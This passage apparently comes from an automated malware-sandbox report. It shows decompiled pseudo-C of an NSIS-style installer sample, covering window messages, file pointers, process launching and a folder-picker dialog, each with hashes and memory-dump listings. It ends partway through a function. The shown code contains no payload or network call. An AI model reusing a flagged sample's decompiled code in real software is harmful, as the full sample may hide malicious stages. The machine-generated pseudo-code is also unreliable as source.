                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                  • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                  • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                  • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044CE(int _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004044dc
                                                  0x004044e2

                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                  • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                  • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                  • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004034E5(long _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004034f3
                                                  0x004034f9

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044BB(int _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004044c5
                                                  0x004044cb

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                  • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                  • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                  • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E00401FA4(void* __ecx) {
                                                  				void* _t9;
                                                  				intOrPtr _t13;
                                                  				void* _t15;
                                                  				void* _t17;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  
                                                  				_t17 = __ecx;
                                                  				_t19 = E00402DA6(_t15);
                                                  				E0040559F(0xffffffeb, _t7); // executed
                                                  				_t9 = E00405B20(_t19); // executed
                                                  				_t20 = _t9;
                                                  				if(_t20 == _t15) {
                                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                  						_t13 = E004069B5(_t17, _t20);
                                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                  							if(_t13 != _t15) {
                                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                  							}
                                                  						} else {
                                                  							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                  						}
                                                  					}
                                                  					_push(_t20);
                                                  					CloseHandle();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                  				return 0;
                                                  			}









                                                  0x00401fa4
                                                  0x00401faa
                                                  0x00401faf
                                                  0x00401fb5
                                                  0x00401fba
                                                  0x00401fbe
                                                  0x0040292e
                                                  0x00401fc4
                                                  0x00401fc7
                                                  0x00401fca
                                                  0x00401fd2
                                                  0x00401fe1
                                                  0x00401fe3
                                                  0x00401fe3
                                                  0x00401fd4
                                                  0x00401fd8
                                                  0x00401fd8
                                                  0x00401fd2
                                                  0x00401fea
                                                  0x00401feb
                                                  0x00401feb
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00403418), ref: 004055FA
                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 0040560C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                    • Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                    • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                    • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                    • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                                                  • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                  • Opcode Fuzzy Hash: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                                                  • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				long _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				long _v36;
                                                  				char _v40;
                                                  				unsigned int _v44;
                                                  				signed int _v48;
                                                  				WCHAR* _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				WCHAR* _v72;
                                                  				void _v76;
                                                  				struct HWND__* _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t82;
                                                  				long _t87;
                                                  				short* _t89;
                                                  				void* _t95;
                                                  				signed int _t96;
                                                  				int _t109;
                                                  				signed short _t114;
                                                  				signed int _t118;
                                                  				struct HWND__** _t122;
                                                  				intOrPtr* _t138;
                                                  				WCHAR* _t146;
                                                  				intOrPtr _t147;
                                                  				unsigned int _t150;
                                                  				signed int _t152;
                                                  				unsigned int _t156;
                                                  				signed int _t158;
                                                  				signed int* _t159;
                                                  				signed int* _t160;
                                                  				struct HWND__* _t166;
                                                  				struct HWND__* _t167;
                                                  				int _t169;
                                                  				unsigned int _t197;
                                                  
                                                  				_t156 = __edx;
                                                  				_t82 =  *0x42c240; // 0x86dd5c
                                                  				_v32 = _t82;
                                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                  				if(_a8 == 0x40b) {
                                                  					E00405B81(0x3fb, _t146);
                                                  					E004067C4(_t146);
                                                  				}
                                                  				_t167 = _a4;
                                                  				if(_a8 != 0x110) {
                                                  					L8:
                                                  					if(_a8 != 0x111) {
                                                  						L20:
                                                  						if(_a8 == 0x40f) {
                                                  							L22:
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_v12 = _v12 & 0x00000000;
                                                  							E00405B81(0x3fb, _t146);
                                                  							if(E00405F14(_t186, _t146) == 0) {
                                                  								_v8 = 1;
                                                  							}
                                                  							E0040653D(0x42b238, _t146);
                                                  							_t87 = E0040690A(1);
                                                  							_v16 = _t87;
                                                  							if(_t87 == 0) {
                                                  								L30:
                                                  								E0040653D(0x42b238, _t146);
                                                  								_t89 = E00405EB7(0x42b238);
                                                  								_t158 = 0;
                                                  								if(_t89 != 0) {
                                                  									 *_t89 = 0;
                                                  								}
                                                  								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                  									goto L35;
                                                  								} else {
                                                  									_t169 = 0x400;
                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                  									asm("cdq");
                                                  									_v48 = _t109;
                                                  									_v44 = _t156;
                                                  									_v12 = 1;
                                                  									goto L36;
                                                  								}
                                                  							} else {
                                                  								_t159 = 0;
                                                  								if(0 == 0x42b238) {
                                                  									goto L30;
                                                  								} else {
                                                  									goto L26;
                                                  								}
                                                  								while(1) {
                                                  									L26:
                                                  									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                  									if(_t114 != 0) {
                                                  										break;
                                                  									}
                                                  									if(_t159 != 0) {
                                                  										 *_t159 =  *_t159 & _t114;
                                                  									}
                                                  									_t160 = E00405E58(0x42b238);
                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                  									_t159 = _t160;
                                                  									 *_t159 = 0x5c;
                                                  									if(_t159 != 0x42b238) {
                                                  										continue;
                                                  									} else {
                                                  										goto L30;
                                                  									}
                                                  								}
                                                  								_t150 = _v44;
                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                  								_v44 = _t150 >> 0xa;
                                                  								_v12 = 1;
                                                  								_t158 = 0;
                                                  								__eflags = 0;
                                                  								L35:
                                                  								_t169 = 0x400;
                                                  								L36:
                                                  								_t95 = E00404E27(5);
                                                  								if(_v12 != _t158) {
                                                  									_t197 = _v44;
                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                  										_v8 = 2;
                                                  									}
                                                  								}
                                                  								_t147 =  *0x433edc; // 0x874466
                                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                  									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                  									if(_v12 == _t158) {
                                                  										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                  									} else {
                                                  										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                  									}
                                                  								}
                                                  								_t96 = _v8;
                                                  								 *0x434fa4 = _t96;
                                                  								if(_t96 == _t158) {
                                                  									_v8 = E0040140B(7);
                                                  								}
                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                  									_v8 = _t158;
                                                  								}
                                                  								E004044BB(0 | _v8 == _t158);
                                                  								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                  									E004048E3();
                                                  								}
                                                  								 *0x42d258 = _t158;
                                                  								goto L53;
                                                  							}
                                                  						}
                                                  						_t186 = _a8 - 0x405;
                                                  						if(_a8 != 0x405) {
                                                  							goto L53;
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					_t118 = _a12 & 0x0000ffff;
                                                  					if(_t118 != 0x3fb) {
                                                  						L12:
                                                  						if(_t118 == 0x3e9) {
                                                  							_t152 = 7;
                                                  							memset( &_v76, 0, _t152 << 2);
                                                  							_v80 = _t167;
                                                  							_v72 = 0x42d268;
                                                  							_v60 = E00404CE0;
                                                  							_v56 = _t146;
                                                  							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                  							_t122 =  &_v80;
                                                  							_v64 = 0x41;
                                                  							__imp__SHBrowseForFolderW(_t122);
                                                  							if(_t122 == 0) {
                                                  								_a8 = 0x40f;
                                                  							} else {
                                                  								__imp__CoTaskMemFree(_t122);
                                                  								E00405E0C(_t146);
                                                  								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                  								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                  									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                  									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                  										lstrcatW(_t146, 0x432ea0);
                                                  									}
                                                  								}
                                                  								 *0x42d258 =  *0x42d258 + 1;
                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					if(_a12 >> 0x10 != 0x300) {
                                                  						goto L53;
                                                  					}
                                                  					_a8 = 0x40f;
                                                  					goto L12;
                                                  				} else {
                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                  					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                  						E00405E0C(_t146);
                                                  					}
                                                  					 *0x433ed8 = _t167;
                                                  					SetWindowTextW(_t166, _t146);
                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                  					_push(1);
                                                  					E00404499(_t167);
                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  					_push(0x14);
                                                  					E00404499(_t167);
                                                  					E004044CE(_t166);
                                                  					_t138 = E0040690A(8);
                                                  					if(_t138 == 0) {
                                                  						L53:
                                                  						return E00404500(_a8, _a12, _a16);
                                                  					} else {
                                                  						 *_t138(_t166, 1);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}














































                                                  0x0040498a
                                                  0x00404990
                                                  0x00404996
                                                  0x004049a3
                                                  0x004049b1
                                                  0x004049b4
                                                  0x004049bc
                                                  0x004049c2
                                                  0x004049c2
                                                  0x004049ce
                                                  0x004049d1
                                                  0x00404a3f
                                                  0x00404a46
                                                  0x00404b1d
                                                  0x00404b24
                                                  0x00404b33
                                                  0x00404b33
                                                  0x00404b37
                                                  0x00404b41
                                                  0x00404b4e
                                                  0x00404b50
                                                  0x00404b50
                                                  0x00404b5e
                                                  0x00404b65
                                                  0x00404b6c
                                                  0x00404b6f
                                                  0x00404bab
                                                  0x00404bad
                                                  0x00404bb3
                                                  0x00404bb8
                                                  0x00404bbc
                                                  0x00404bbe
                                                  0x00404bbe
                                                  0x00404bda
                                                  0x00000000
                                                  0x00404bdc
                                                  0x00404bdf
                                                  0x00404bed
                                                  0x00404bf3
                                                  0x00404bf4
                                                  0x00404bf7
                                                  0x00404bfa
                                                  0x00000000
                                                  0x00404bfa
                                                  0x00404b71
                                                  0x00404b73
                                                  0x00404b77
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b79
                                                  0x00404b79
                                                  0x00404b86
                                                  0x00404b8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b8f
                                                  0x00404b91
                                                  0x00404b91
                                                  0x00404b9a
                                                  0x00404b9c
                                                  0x00404ba1
                                                  0x00404ba4
                                                  0x00404ba9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ba9
                                                  0x00404c06
                                                  0x00404c10
                                                  0x00404c13
                                                  0x00404c16
                                                  0x00404c1d
                                                  0x00404c1d
                                                  0x00404c1f
                                                  0x00404c1f
                                                  0x00404c24
                                                  0x00404c26
                                                  0x00404c2e
                                                  0x00404c35
                                                  0x00404c37
                                                  0x00404c42
                                                  0x00404c42
                                                  0x00404c37
                                                  0x00404c49
                                                  0x00404c52
                                                  0x00404c5c
                                                  0x00404c64
                                                  0x00404c7f
                                                  0x00404c66
                                                  0x00404c6f
                                                  0x00404c6f
                                                  0x00404c64
                                                  0x00404c84
                                                  0x00404c89
                                                  0x00404c8e
                                                  0x00404c97
                                                  0x00404c97
                                                  0x00404ca0
                                                  0x00404ca2
                                                  0x00404ca2
                                                  0x00404cae
                                                  0x00404cb6
                                                  0x00404cc0
                                                  0x00404cc0
                                                  0x00404cc5
                                                  0x00000000
                                                  0x00404cc5
                                                  0x00404b6f
                                                  0x00404b26
                                                  0x00404b2d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b2d
                                                  0x00404a4c
                                                  0x00404a55
                                                  0x00404a6f
                                                  0x00404a74
                                                  0x00404a7e
                                                  0x00404a85
                                                  0x00404a91
                                                  0x00404a94
                                                  0x00404a97
                                                  0x00404a9e
                                                  0x00404aa6
                                                  0x00404aa9
                                                  0x00404aad
                                                  0x00404ab4
                                                  0x00404abc
                                                  0x00404b16
                                                  0x00404abe
                                                  0x00404abf
                                                  0x00404ac6
                                                  0x00404ad0
                                                  0x00404ad8
                                                  0x00404ae5
                                                  0x00404af9
                                                  0x00404afd
                                                  0x00404afd
                                                  0x00404af9
                                                  0x00404b02
                                                  0x00404b0f
                                                  0x00404b0f
                                                  0x00404abc
                                                  0x00000000
                                                  0x00404a74
                                                  0x00404a62
                                                  0x00000000
                                                  0x00000000
                                                  0x00404a68
                                                  0x00000000
                                                  0x004049d3
                                                  0x004049e0
                                                  0x004049e9
                                                  0x004049f6
                                                  0x004049f6
                                                  0x004049fd
                                                  0x00404a03
                                                  0x00404a0c
                                                  0x00404a0f
                                                  0x00404a12
                                                  0x00404a1a
                                                  0x00404a1d
                                                  0x00404a20
                                                  0x00404a26
                                                  0x00404a2d
                                                  0x00404a34
                                                  0x00404ccb
                                                  0x00404cdd
                                                  0x00404a3a
                                                  0x00404a3d
                                                  0x00000000
                                                  0x00404a3d
                                                  0x00404a34

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                    • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                    • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                    • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                    • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                    • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                  • API String ID: 2624150263-3142480687
                                                  • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                  • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                  • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                  • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E71081BFF() {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				WCHAR* _v24;
                                                  				WCHAR* _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				WCHAR* _v48;
                                                  				signed int _v52;
                                                  				void* _v56;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _t208;
                                                  				signed int _t211;
                                                  				void* _t213;
                                                  				void* _t215;
                                                  				WCHAR* _t217;
                                                  				void* _t225;
                                                  				struct HINSTANCE__* _t226;
                                                  				struct HINSTANCE__* _t227;
                                                  				struct HINSTANCE__* _t229;
